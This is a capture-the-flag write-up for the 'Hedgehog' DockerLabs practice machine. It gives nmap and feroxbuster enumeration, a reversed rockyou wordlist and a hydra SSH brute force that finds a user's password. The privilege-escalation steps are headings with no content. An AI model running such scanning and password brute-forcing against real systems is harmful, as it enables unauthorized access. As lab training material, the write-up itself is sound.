Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Hedgehog

machine downloaded from: https://dockerlabs.es/

difficulty: Very Easy

OS: Linux

12 September 2025


  1. Download, extract, and start the container:
bash auto_deploy.sh hedgehog.tar
  1. Enumerate services with Nmap:
nmap -A -p- -sV 172.17.0.2

Nmap detected only two services:

  • Port 22 ssh OpenSSH 9.6p1
  • Port 80 http httpd 2.4.58
  1. Web content discovery
feroxbuster --url http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -t 100
  1. Found username tails on the web page.
  1. Prepared a custom wordlist by reversing rockyou and stripping spaces:
tac rockyou.txt > yourock.txt
sed 's/ //g' > wordlist.txt
  1. Brute force SSH for user tails with hydra and the modified wordlist:
hydra -l tails -P wordlist.txt ssh://172.17.0.2

Hydra returned valid credentials for tails.

  1. Privilege escalation from tails to sonic:
  1. As sonic, inspect sudo rights and escalate to root: